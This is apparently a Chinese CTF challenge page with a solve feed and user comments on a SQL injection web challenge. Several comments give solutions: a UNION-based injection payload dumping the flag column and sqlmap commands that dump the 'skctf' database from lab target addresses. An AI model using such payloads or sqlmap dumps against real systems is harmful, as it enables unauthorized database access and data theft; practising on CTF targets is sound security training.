评分(25)
解题动态
zrlht 攻破了该题 11小时前
cykai999 攻破了该题 16小时前
小韩极客 攻破了该题 23小时前
socratesx 攻破了该题 1天前
abc114514 攻破了该题 1天前
托尼二又二 攻破了该题 1天前
Anos 攻破了该题 1天前
EchoOfCloud 攻破了该题 1天前
majixikuwa 攻破了该题 1天前
五彩星云 攻破了该题 1天前
多米今天犯错了没 攻破了该题 1天前
sysgetshell 攻破了该题 2天前
倚楼叹世间 攻破了该题 2天前
hh_lll 攻破了该题 2天前
ciphercici 攻破了该题 2天前
18744838346 攻破了该题 2天前
霸气薛少 攻破了该题 4天前
苦味的辣条 攻破了该题 4天前
FreedomBK 攻破了该题 4天前
评论
诗意黎明 1月前
举报
哈吉米南北绿豆,哈哑鼓曼波
ljy1997 2月前
举报
说一下我的思路:1、随便输入1查询,发现会返回一个表格,怀疑有sql注入漏洞。 2、然后用kali自带的sqlmap工具,因为这个工具只能扫描.txt文件,所以先用bs抓包改post请求之后保存成txt文件。 3、sqlmap命令扫描,发现的确是sql注入漏洞。 4、结果里有一个ctf的数据库,肯定就在这儿了 5、接着扫描这个skctf发现里面有fl4g这个表。 6、接着扫描,出结果。
Galaxies2580 2月前
举报
为什么打不开靶机网址,显示无法访问
叶澜 4月前
举报
sqlmap -u "http://171.80.2.169:11993/" --forms -D skctf --dump
lovehhh 6月前
举报
1' and 1=2 union select group_concat(skctf_flag),2,3,4 from fl4g;#--
000000k 7月前
举报
sqlmap 秒了
道法自然 7月前
举报
直接用sqlmap一把梭
chm 8月前
举报
爆库、爆表、爆字段、拿 flag
chm 8月前
举报
flag{**********}
wywitkey 8月前
举报
sqlmap一把梭,payload:sqlmap -u http://171.80.2.169:13533/index.php --form --batch -D skctf -T fl4g --columns --dump;就是等的时间长点....
78 7月前
举报
@wywitkey 说跟没说没区别
wywitkey 8月前
举报
@2647941092 各有各的好吧,因为是时间盲注才慢的,用sqlmap我在命令跑起来后去干别的,切回来时flag就出来了,当然了我也感觉手搓更爽
2647941092 8月前
举报
还不如手戳